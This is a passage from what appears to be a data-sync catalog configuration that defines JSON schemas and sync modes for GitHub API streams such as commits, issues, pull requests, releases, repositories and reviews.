{'type': ['null', 'object'], 'properties': {'date': {'type': ['null', 'string'], 'format': 'date-time'}, 'name': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}}}, 'verification': {'type': ['null', 'object'], 'properties': {'reason': {'type': ['null', 'string']}, 'payload': {'type': ['null', 'string']}, 'verified': {'type': ['null', 'boolean']}, 'signature': {'type': ['null', 'string']}}}, 'comment_count': {'type': ['null', 'integer']}}}, 'node_id': {'type': ['null', 'string']}, 'parents': {'type': ['null', 'array'], 'items': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}}}}, 'html_url': {'type': ['null', 'string']}, 'author_id': {'type': ['null', 'integer']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'comments_url': {'type': ['null', 'string']}, 'committer_id': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['sha']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['sha']], 'aliasName': 'commits', 'selected': True}}, {'stream': {'name': 'events', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'org_id': {'type': ['null', 'integer']}, 'public': {'type': ['null', 'boolean']}, 'payload': {'type': ['null', 'object'], 'properties': {}}, 'repo_id': {'type': ['null', 'integer']}, 'actor_id': {'type': ['null', 'integer']}, 'created_at': {'type': ['null', 'string']}, 'repository': {'type': ['string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'events', 'selected': True}}, {'stream': {'name': 'issue_events', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 
'url': {'type': ['null', 'string']}, 'event': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'actor_id': {'type': ['null', 'integer']}, 'issue_id': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'commit_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_events', 'selected': True}}, {'stream': {'name': 'issue_labels', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'color': {'type': ['null', 'string']}, 'default': {'type': ['null', 'boolean']}, 'node_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'description': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_labels', 'selected': True}}, {'stream': {'name': 'issue_milestones', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, 'due_on': {'type': ['null', 'string'], 'format': 'date-time'}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'creator_id': {'type': ['null', 'integer']}, 'labels_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'description': {'type': ['null', 'string']}, 'open_issues': {'type': ['null', 'integer']}, 'closed_issues': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issue_milestones', 'selected': True}}, {'stream': {'name': 'issues', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': 
['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, 'labels': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'locked': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'user_id': {'type': ['null', 'integer']}, 'comments': {'type': ['null', 'integer']}, 'html_url': {'type': ['null', 'string']}, 'assignees': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'events_url': {'type': ['null', 'string']}, 'labels_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'assignee_id': {'type': ['null', 'integer']}, 'comments_url': {'type': ['null', 'string']}, 'milestone_id': {'type': ['null', 'integer']}, 'pull_request': {'type': ['null', 'object'], 'properties': {'url': {'type': ['null', 'string']}, 'diff_url': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'patch_url': {'type': ['null', 'string']}}}, 'repository_url': {'type': ['null', 'string']}, 'active_lock_reason': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'issues', 'selected': True}}, {'stream': {'name': 'organizations', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'blog': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'plan': {'type': ['null', 'object'], 'properties': {'name': {'type': ['null', 'string']}, 'seats': {'type': ['null', 'integer']}, 'space': {'type': ['null', 'integer']}, 'filled_seats': {'type': ['null', 'integer']}, 'private_repos': {'type': ['null', 'integer']}}}, 'type': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'company': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'location': {'type': ['null', 'string']}, 'followers': {'type': ['null', 'integer']}, 'following': {'type': ['null', 'integer']}, 'hooks_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'disk_usage': {'type': ['null', 'integer']}, 'events_url': {'type': ['null', 'string']}, 'issues_url': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'description': {'type': ['null', 'string']}, 'is_verified': {'type': ['null', 'boolean']}, 'members_url': {'type': ['null', 'string']}, 'public_gists': {'type': ['null', 'integer']}, 
'public_repos': {'type': ['null', 'integer']}, 'billing_email': {'type': ['null', 'string']}, 'collaborators': {'type': ['null', 'integer']}, 'private_gists': {'type': ['null', 'integer']}, 'twitter_username': {'type': ['null', 'string']}, 'public_members_url': {'type': ['null', 'string']}, 'owned_private_repos': {'type': ['null', 'integer']}, 'total_private_repos': {'type': ['null', 'integer']}, 'has_repository_projects': {'type': ['null', 'boolean']}, 'members_can_create_pages': {'type': ['null', 'boolean']}, 'has_organization_projects': {'type': ['null', 'boolean']}, 'default_repository_permission': {'type': ['null', 'string']}, 'two_factor_requirement_enabled': {'type': ['null', 'boolean']}, 'members_can_create_public_pages': {'type': ['null', 'boolean']}, 'members_can_create_repositories': {'type': ['null', 'boolean']}, 'members_can_create_private_pages': {'type': ['null', 'boolean']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'organizations', 'selected': True}}, {'stream': {'name': 'projects', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'owner_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'creator_id': {'type': ['null', 'integer']}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'columns_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'projects', 'selected': True}}, {'stream': {'name': 'pull_request_stats', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'merged': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'commits': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'comments': {'type': ['null', 'integer']}, 'additions': {'type': ['null', 'integer']}, 'deletions': {'type': ['null', 'integer']}, 'mergeable': {'type': ['null', 'boolean']}, 'merged_by': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 
'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'rebaseable': {'type': ['null', 'boolean']}, 'repository': {'type': ['string']}, 'changed_files': {'type': ['null', 'integer']}, 'mergeable_state': {'type': ['null', 'string']}, 'review_comments': {'type': ['null', 'integer']}, 'maintainer_can_modify': {'type': ['null', 'boolean']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'pull_request_stats', 'selected': True}}, {'stream': {'name': 'pull_requests', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'base': {'type': ['null', 'object'], 'properties': {'ref': {'type': ['null', 'string']}, 'sha': {'type': ['null', 'string']}, 'label': {'type': ['null', 'string']}, 'repo_id': {'type': ['null', 'integer']}, 'user_id': {'type': ['null', 'integer']}}}, 'body': {'type': ['null', 'string']}, 'head': {'type': ['null', 'object'], 'properties': {'ref': {'type': ['null', 'string']}, 'sha': {'type': ['null', 'string']}, 'label': {'type': ['null', 'string']}, 'repo_id': {'type': ['null', 'integer']}, 'user_id': {'type': ['null', 'integer']}}}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'draft': {'type': ['null', 'boolean']}, 'state': {'type': ['null', 'string']}, 'title': {'type': ['null', 'string']}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'self': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'issue': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'commits': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'comments': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'statuses': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'review_comment': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'review_comments': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'labels': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'locked': {'type': ['null', 'boolean']}, 'number': {'type': ['null', 'integer']}, 'node_id': {'type': ['null', 'string']}, 'diff_url': {'type': ['null', 'string']}, 
'html_url': {'type': ['null', 'string']}, 'assignees': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'closed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'issue_url': {'type': ['null', 'string']}, 'merged_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'patch_url': {'type': ['null', 'string']}, 'auto_merge': {'type': ['null', 'boolean']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'assignee_id': {'type': ['null', 'integer']}, 'commits_url': {'type': ['null', 'string']}, 'comments_url': {'type': ['null', 'string']}, 'milestone_id': {'type': ['null', 'integer']}, 'statuses_url': {'type': ['null', 'string']}, 'requested_teams': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'merge_commit_sha': {'type': ['null', 'string']}, 'active_lock_reason': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}, 'review_comment_url': {'type': ['null', 'string']}, 'requested_reviewers': {'type': ['null', 'array'], 'items': {'type': ['null', 'integer']}}, 'review_comments_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'pull_requests', 'selected': True}}, {'stream': {'name': 'releases', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'draft': {'type': ['null', 'boolean']}, 'assets': {'type': ['null', 'array'], 'items': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'size': {'type': ['null', 'integer']}, 'label': {'type': ['null', 'string']}, 'state': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'uploader_id': {'type': ['null', 'integer']}, 'content_type': {'type': ['null', 'string']}, 'download_count': {'type': ['null', 'integer']}, 'browser_download_url': {'type': ['null', 'string']}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'tag_name': {'type': ['null', 'string']}, 'author_id': {'type': ['null', 'integer']}, 'assets_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'prerelease': {'type': ['null', 'boolean']}, 'repository': {'type': ['string']}, 'upload_url': {'type': ['null', 'string']}, 'tarball_url': {'type': ['null', 'string']}, 'zipball_url': {'type': ['null', 'string']}, 'published_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'target_commitish': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['created_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['created_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'releases', 
'selected': True}}, {'stream': {'name': 'repositories', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'fork': {'type': ['null', 'boolean']}, 'name': {'type': ['null', 'string']}, 'size': {'type': ['null', 'integer']}, 'owner': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'topics': {'type': ['null', 'array'], 'items': {'type': ['null', 'string']}}, 'git_url': {'type': ['null', 'string']}, 'license': {'type': ['null', 'object'], 'properties': {'key': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'name': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'spdx_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'private': {'type': ['null', 'boolean']}, 'ssh_url': {'type': ['null', 'string']}, 'svn_url': {'type': ['null', 'string']}, 'archived': {'type': ['null', 'boolean']}, 'disabled': {'type': ['null', 'boolean']}, 'has_wiki': {'type': ['null', 'boolean']}, 'homepage': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'keys_url': {'type': ['null', 'string']}, 'language': {'type': ['null', 'string']}, 'tags_url': {'type': ['null', 'string']}, 'blobs_url': {'type': ['null', 'string']}, 'clone_url': {'type': ['null', 'string']}, 'forks_url': {'type': ['null', 'string']}, 'full_name': {'type': ['null', 'string']}, 'has_pages': {'type': ['null', 'boolean']}, 'hooks_url': {'type': ['null', 'string']}, 'pulls_url': {'type': ['null', 'string']}, 'pushed_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'teams_url': {'type': ['null', 'string']}, 'trees_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'events_url': {'type': ['null', 'string']}, 'has_issues': {'type': ['null', 'boolean']}, 'issues_url': {'type': ['null', 'string']}, 'labels_url': {'type': ['null', 'string']}, 'merges_url': {'type': ['null', 'string']}, 'mirror_url': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'visibility': {'type': ['null', 'string']}, 'archive_url': {'type': ['null', 'string']}, 'commits_url': {'type': ['null', 'string']}, 'compare_url': {'type': ['null', 'string']}, 'description': {'type': ['null', 'string']}, 'forks_count': {'type': ['null', 'integer']}, 'is_template': {'type': ['null', 'boolean']}, 'permissions': {'type': ['null', 'object'], 'properties': {'pull': {'type': ['null', 'boolean']}, 'push': {'type': ['null', 'boolean']}, 'admin': {'type': ['null', 'boolean']}}}, 'branches_url': {'type': ['null', 'string']}, 'comments_url': {'type': ['null', 'string']}, 
'contents_url': {'type': ['null', 'string']}, 'git_refs_url': {'type': ['null', 'string']}, 'git_tags_url': {'type': ['null', 'string']}, 'has_projects': {'type': ['null', 'boolean']}, 'releases_url': {'type': ['null', 'string']}, 'statuses_url': {'type': ['null', 'string']}, 'assignees_url': {'type': ['null', 'string']}, 'downloads_url': {'type': ['null', 'string']}, 'has_downloads': {'type': ['null', 'boolean']}, 'languages_url': {'type': ['null', 'string']}, 'default_branch': {'type': ['null', 'string']}, 'milestones_url': {'type': ['null', 'string']}, 'stargazers_url': {'type': ['null', 'string']}, 'watchers_count': {'type': ['null', 'integer']}, 'deployments_url': {'type': ['null', 'string']}, 'git_commits_url': {'type': ['null', 'string']}, 'subscribers_url': {'type': ['null', 'string']}, 'contributors_url': {'type': ['null', 'string']}, 'issue_events_url': {'type': ['null', 'string']}, 'stargazers_count': {'type': ['null', 'integer']}, 'subscription_url': {'type': ['null', 'string']}, 'collaborators_url': {'type': ['null', 'string']}, 'issue_comment_url': {'type': ['null', 'string']}, 'notifications_url': {'type': ['null', 'string']}, 'open_issues_count': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'repositories', 'selected': True}}, {'stream': {'name': 'review_comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'line': {'type': ['null', 'integer']}, 'path': {'type': ['null', 'string']}, 'side': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'self': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'pull_request': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'position': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'diff_hunk': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'start_line': {'type': ['null', 'integer']}, 'start_side': {'type': ['null', 'string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 
'original_line': {'type': ['null', 'integer']}, 'in_reply_to_id': {'type': ['null', 'integer']}, 'pull_request_url': {'type': ['null', 'string']}, 'original_position': {'type': ['null', 'integer']}, 'author_association': {'type': ['null', 'string']}, 'original_commit_id': {'type': ['null', 'string']}, 'original_start_line': {'type': ['null', 'integer']}, 'pull_request_review_id': {'type': ['null', 'integer']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'review_comments', 'selected': True}}, {'stream': {'name': 'reviews', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'state': {'type': ['null', 'string']}, '_links': {'type': ['null', 'object'], 'properties': {'html': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}, 'pull_request': {'type': ['null', 'object'], 'properties': {'href': {'type': ['null', 'string']}}}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'commit_id': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'submitted_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'pull_request_url': {'type': ['null', 'string']}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'reviews', 'selected': True}}, {'stream': {'name': 'stargazers', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 
